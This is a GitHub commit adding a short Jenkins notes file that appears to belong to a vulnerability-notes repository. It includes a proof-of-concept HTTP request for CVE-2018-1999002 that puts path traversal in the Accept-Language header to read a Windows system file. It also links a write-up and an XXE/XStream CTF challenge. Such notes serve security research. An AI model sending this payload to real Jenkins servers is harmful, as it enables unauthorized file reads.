Skip to content

Commit eb0d021

Browse files
authored
Create Readme.md
1 parent 678cd97 commit eb0d021

1 file changed

Lines changed: 18 additions & 0 deletions

File tree

Jenkins/Readme.md

Lines changed: 18 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,18 @@
1+
# Jenkins
2+
3+
## CVE-2018-1999002
4+
poc
5+
```
6+
GET /plugin/credentials/.ini HTTP/1.1
7+
Host:
8+
Accept-Language: ../../../../../../../../windows/win
9+
```
10+
[Jenkins 任意文件读取漏洞复现与分析 - 【CVE-2018-1999002](https://chybeta.github.io/2018/08/07/Jenkins-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E4%B8%8E%E5%88%86%E6%9E%90-%E3%80%90CVE-2018-1999002%E3%80%91/)
11+
12+
linux 下利用难度大 必须找一个存在`_`的目录
13+
14+
15+
16+
17+
## 插件问题 xxe/xstream 反序列化
18+
https://github.com/Firebasky/ctf-Challenge/tree/main/2021_xyb_easyJenkins

0 commit comments

Comments
 (0)